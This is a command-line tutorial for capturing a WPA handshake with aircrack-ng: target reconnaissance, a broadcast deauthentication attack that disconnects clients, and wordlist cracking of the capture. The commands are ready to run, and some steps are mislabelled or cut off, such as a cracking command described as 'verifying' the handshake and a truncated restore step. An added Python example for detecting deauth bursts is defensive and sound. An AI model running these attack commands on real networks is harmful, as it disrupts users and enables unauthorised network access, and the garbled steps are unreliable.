Handshake — Aircrack-ng

sudo airmon-ng

Kill interfering processes:

sudo airmon-ng check kill

Start monitor mode on the interface (e.g., wlan0):

sudo airodump-ng wlan0mon

Note the BSSID (MAC of target AP), CH (channel), and ESSID (network name).

3. Focus on the Target AP

Start a targeted capture to a file:

sudo airodump-ng --bssid <AP_MAC> -c <channel> -w capture wlan0mon

Replace <AP_MAC> and <channel> accordingly. The output files will begin with capture-01 (e.g., capture-01.cap).

If no client is actively connecting, force reauthentication using aireplay-ng (deauthentication attack):

sudo aireplay-ng --deauth 5 -a <AP_MAC> wlan0mon

This sends 5 deauth packets to broadcast, disconnecting connected clients. Upon reconnection, the 4-way handshake occurs. In the airodump-ng window, watch the top-right corner. When a handshake is captured, you’ll see:

WPA handshake: <AP_MAC>

The .cap file now contains the handshake. Press Ctrl+C to stop airodump-ng. To verify the handshake explicitly:

aircrack-ng -w wordlist.txt capture-01.cap

Restore network services:
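Added example, not part of the original page: the aireplay-ng deauthentication step described above appears on the air as a burst of 802.11 deauthentication frames carrying the AP's BSSID, which a monitoring sensor can flag. The frames, the MAC address, and the threshold and window values below are constructed or assumed for illustration.

```python
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_deauth(frame):
    """Return (dest, bssid, reason) for a radiotap-wrapped 802.11 deauth frame, else None."""
    if len(frame) < 8:
        return None
    rt_len = struct.unpack_from("<H", frame, 2)[0]  # radiotap header length (little-endian)
    dot11 = frame[rt_len:]
    if rt_len < 8 or len(dot11) < 26:  # 24-byte management header + 2-byte reason code
        return None
    ftype, subtype = (dot11[0] >> 2) & 0x3, (dot11[0] >> 4) & 0xF
    if (ftype, subtype) != (0, 12):  # management frame, subtype 12 = deauthentication
        return None
    reason = struct.unpack_from("<H", dot11, 24)[0]
    return mac(dot11[4:10]), mac(dot11[16:22]), reason

def find_deauth_bursts(capture, threshold=5, window=1.0):
    """capture: iterable of (timestamp_seconds, raw_frame). threshold/window are assumed values."""
    recent = defaultdict(list)
    alerts = []
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        dest, bssid, reason = parsed
        key = (bssid, dest)
        recent[key] = [t for t in recent[key] if ts - t < window] + [ts]
        if len(recent[key]) == threshold:  # alert once when the burst reaches the threshold
            alerts.append({"bssid": bssid, "dest": dest, "reason": reason, "broadcast": dest == BROADCAST, "at": ts})
    return alerts

def sample_capture():
    """Constructed frames: one beacon, then five broadcast deauths 100 ms apart."""
    radiotap = bytes([0, 0, 8, 0, 0, 0, 0, 0])   # minimal 8-byte radiotap header
    ap = bytes.fromhex("020000000001")           # constructed, locally administered MAC
    def frame(fc, body):
        return radiotap + bytes([fc, 0, 0, 0]) + b"\xff" * 6 + ap + ap + b"\x00\x00" + body
    beacon = frame(0x80, b"\x00" * 12)
    deauth = frame(0xC0, struct.pack("<H", 7))   # constructed reason code 7
    return [(0.0, beacon)] + [(0.1 * i, deauth) for i in range(1, 6)]

if __name__ == "__main__":
    print(find_deauth_bursts(sample_capture()))
```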